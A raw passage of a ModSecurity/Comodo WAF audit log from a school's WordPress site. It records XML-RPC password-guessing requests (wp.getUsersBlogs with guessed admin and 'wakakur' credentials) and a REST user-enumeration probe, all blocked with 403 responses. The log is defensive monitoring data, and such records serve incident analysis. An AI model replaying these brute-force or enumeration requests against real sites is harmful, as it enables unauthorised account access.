[uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863268130298 5383 (- - -) Stopwatch2: 1749863268130298 5383; combined=3742, p1=453, p2=3119, p3=0, p4=0, p5=101, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --710fee0b-Z-- --d3b1b263-A-- [14/Jun/2025:08:07:49 +0700] aEzLZUMWfhkd5Y0sFtrn-wAAAJA 103.236.140.4 57240 103.236.140.4 8181 --d3b1b263-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d3b1b263-C-- wp.getUsersBlogs admin computer --d3b1b263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3b1b263-E-- --d3b1b263-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863269179674 4404 (- - -) Stopwatch2: 1749863269179674 4404; combined=3296, p1=341, p2=2763, p3=0, p4=0, p5=109, sr=77, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3b1b263-Z-- --e68e6a4d-A-- [14/Jun/2025:08:08:49 +0700] aEzLoUMWfhkd5Y0sFtroIwAAAIo 103.236.140.4 57356 103.236.140.4 8181 --e68e6a4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e68e6a4d-C-- wp.getUsersBlogs admin bailey --e68e6a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e68e6a4d-E-- --e68e6a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863329933804 4303 (- - -) Stopwatch2: 1749863329933804 4303; combined=3309, p1=348, p2=2765, p3=0, p4=0, p5=111, sr=79, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e68e6a4d-Z-- --6fb2726c-A-- [14/Jun/2025:08:09:49 +0700] aEzL3V3g_boun6Rx5jLOVQAAAMw 103.236.140.4 57484 103.236.140.4 8181 --6fb2726c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fb2726c-C-- wp.getUsersBlogs admin taylor --6fb2726c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb2726c-E-- --6fb2726c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863389035187 4304 (- - -) Stopwatch2: 1749863389035187 4304; combined=3230, p1=396, p2=2664, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb2726c-Z-- --6ea8875d-A-- [14/Jun/2025:08:10:49 +0700] aEzMGV3g_boun6Rx5jLOcQAAANE 103.236.140.4 57600 103.236.140.4 8181 --6ea8875d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ea8875d-C-- wp.getUsersBlogs admin charlie1 --6ea8875d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ea8875d-E-- --6ea8875d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863449471162 2873 (- - -) Stopwatch2: 1749863449471162 2873; combined=2062, p1=240, p2=1701, p3=0, p4=0, p5=69, sr=50, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ea8875d-Z-- --12d69843-A-- [14/Jun/2025:08:11:54 +0700] aEzMWmIDXuKmWNi2UBSzfAAAAEM 103.236.140.4 57802 103.236.140.4 8181 --12d69843-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12d69843-C-- wp.getUsersBlogs admin pa55word --12d69843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12d69843-E-- --12d69843-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863514337933 5569 (- - -) Stopwatch2: 1749863514337933 5569; combined=3887, p1=483, p2=3196, p3=0, p4=0, p5=118, sr=117, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12d69843-Z-- --d181cf3e-A-- [14/Jun/2025:08:12:36 +0700] aEzMhEMWfhkd5Y0sFtroQwAAAJQ 103.236.140.4 57936 103.236.140.4 8181 --d181cf3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.204.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.204.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d181cf3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d181cf3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749863556787802 1958 (- - -) Stopwatch2: 1749863556787802 1958; combined=1000, p1=315, p2=657, p3=0, p4=0, p5=27, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d181cf3e-Z-- --c9113550-A-- [14/Jun/2025:08:12:57 +0700] aEzMmWmwZ6YUkjOdtI7BHgAAAAk 103.236.140.4 57966 103.236.140.4 8181 --c9113550-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c9113550-C-- wp.getUsersBlogs admin tottenham1 --c9113550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9113550-E-- --c9113550-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863577651843 5369 (- - -) Stopwatch2: 1749863577651843 5369; combined=3756, p1=483, p2=3060, p3=0, p4=0, p5=121, sr=90, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9113550-Z-- --7311635a-A-- [14/Jun/2025:08:13:57 +0700] aEzM1WIDXuKmWNi2UBSzwwAAAEI 103.236.140.4 58088 103.236.140.4 8181 --7311635a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7311635a-C-- wp.getUsersBlogs wakakur password --7311635a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7311635a-E-- --7311635a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863637306656 31230 (- - -) Stopwatch2: 1749863637306656 31230; combined=55381, p1=435, p2=3025, p3=0, p4=0, p5=25974, sr=88, sw=81, l=0, gc=25866 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7311635a-Z-- --151ad360-A-- [14/Jun/2025:08:14:57 +0700] aEzNEWmwZ6YUkjOdtI7BWgAAABc 103.236.140.4 58284 103.236.140.4 8181 --151ad360-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --151ad360-C-- wp.getUsersBlogs wakakur wakakurpwd --151ad360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --151ad360-E-- --151ad360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863697002471 2969 (- - -) Stopwatch2: 1749863697002471 2969; combined=2252, p1=254, p2=1882, p3=0, p4=0, p5=67, sr=56, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --151ad360-Z-- --59c9c94c-A-- [14/Jun/2025:08:16:03 +0700] aEzNU0MWfhkd5Y0sFtrobgAAAJI 103.236.140.4 58386 103.236.140.4 8181 --59c9c94c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --59c9c94c-C-- wp.getUsersBlogs wakakur wakakur2003 --59c9c94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59c9c94c-E-- --59c9c94c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863763069988 5296 (- - -) Stopwatch2: 1749863763069988 5296; combined=3752, p1=475, p2=3094, p3=0, p4=0, p5=106, sr=106, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59c9c94c-Z-- --1cd44734-A-- [14/Jun/2025:08:17:12 +0700] aEzNmF3g_boun6Rx5jLO1gAAAME 103.236.140.4 58520 103.236.140.4 8181 --1cd44734-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1cd44734-C-- wp.getUsersBlogs wakakur marketing2023_ --1cd44734-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cd44734-E-- --1cd44734-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863832837626 5439 (- - -) Stopwatch2: 1749863832837626 5439; combined=3802, p1=480, p2=3151, p3=0, p4=0, p5=100, sr=104, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cd44734-Z-- --faf3b645-A-- [14/Jun/2025:08:18:30 +0700] aEzN5l3g_boun6Rx5jLO7AAAAMQ 103.236.140.4 58622 103.236.140.4 8181 --faf3b645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --faf3b645-C-- wp.getUsersBlogs wakakur Pass1234 --faf3b645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf3b645-E-- --faf3b645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863910840104 6201 (- - -) Stopwatch2: 1749863910840104 6201; combined=4305, p1=563, p2=3573, p3=0, p4=0, p5=100, sr=98, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf3b645-Z-- --84fc8356-A-- [14/Jun/2025:08:19:33 +0700] aEzOJV3g_boun6Rx5jLPJgAAANM 103.236.140.4 58744 103.236.140.4 8181 --84fc8356-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --84fc8356-C-- wp.getUsersBlogs wakakur Administrators --84fc8356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84fc8356-E-- --84fc8356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863973768747 4604 (- - -) Stopwatch2: 1749863973768747 4604; combined=3473, p1=360, p2=2920, p3=0, p4=0, p5=110, sr=80, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84fc8356-Z-- --2f45a811-A-- [14/Jun/2025:08:20:39 +0700] aEzOZ0MWfhkd5Y0sFtrokQAAAIs 103.236.140.4 58864 103.236.140.4 8181 --2f45a811-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2f45a811-C-- wp.getUsersBlogs wakakur 12345!@#$% --2f45a811-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f45a811-E-- --2f45a811-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864039221893 28457 (- - -) Stopwatch2: 1749864039221893 28457; combined=49902, p1=476, p2=3100, p3=0, p4=0, p5=23178, sr=105, sw=72, l=0, gc=23076 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f45a811-Z-- --a176cf6b-A-- [14/Jun/2025:08:21:42 +0700] aEzOpkMWfhkd5Y0sFtronAAAAIA 103.236.140.4 58900 103.236.140.4 8181 --a176cf6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a176cf6b-C-- wp.getUsersBlogs wakakur admin098123 --a176cf6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a176cf6b-E-- --a176cf6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864102477366 5930 (- - -) Stopwatch2: 1749864102477366 5930; combined=4058, p1=517, p2=3366, p3=0, p4=0, p5=104, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a176cf6b-Z-- --6fb81c52-A-- [14/Jun/2025:08:22:43 +0700] aEzO40MWfhkd5Y0sFtro0AAAAIg 103.236.140.4 59046 103.236.140.4 8181 --6fb81c52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fb81c52-C-- wp.getUsersBlogs wakakur codename --6fb81c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb81c52-E-- --6fb81c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 